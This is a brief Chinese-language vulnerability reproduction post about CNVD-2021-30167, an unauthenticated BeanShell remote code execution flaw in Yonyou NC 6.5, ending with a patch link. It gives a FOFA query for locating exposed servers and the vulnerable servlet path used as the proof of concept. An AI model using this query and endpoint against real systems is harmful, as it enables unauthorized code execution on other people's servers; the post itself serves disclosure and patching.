【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现
2021-06-05 10:56:09 Author: mp.weixin.qq.com(查看原文) 阅读量:443 收藏

文章来源:渗透Xiao白帽

0x01 简介

该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。

0x02 影响版本

NC6.5版本

0x03 漏洞复现

FOFA语句:

icon_hash="1085941792"

访问目标站点这个酱紫

执行命令

PoC:

/servlet/~ic/bsh.servlet.BshServlet

脚本验证

用脚写的太菜就不放出来见笑了

0x04 修复方案

官方已发布安全补丁,建议使用该产品的用户及时安装该漏洞补丁包。下载链接:http://umc.yonyou.com/ump/querypatchdetailedmng?PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19

推荐文章++++

*CVE-2021-21975:VMware vRealize SSRF复现

*FastAdmin前台分片传输上传文件getshell复现

*CVE-2021-26295:Apache OFBiz反序列化漏洞复现


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650513620&idx=2&sn=6d6ce65e3f1a959bab922de94e2241fa&chksm=83bac530b4cd4c26292646def73e7bdead71739f371a354d28d686878ba034f43ce091be6663#rd
如有侵权请联系:admin#unsafe.sh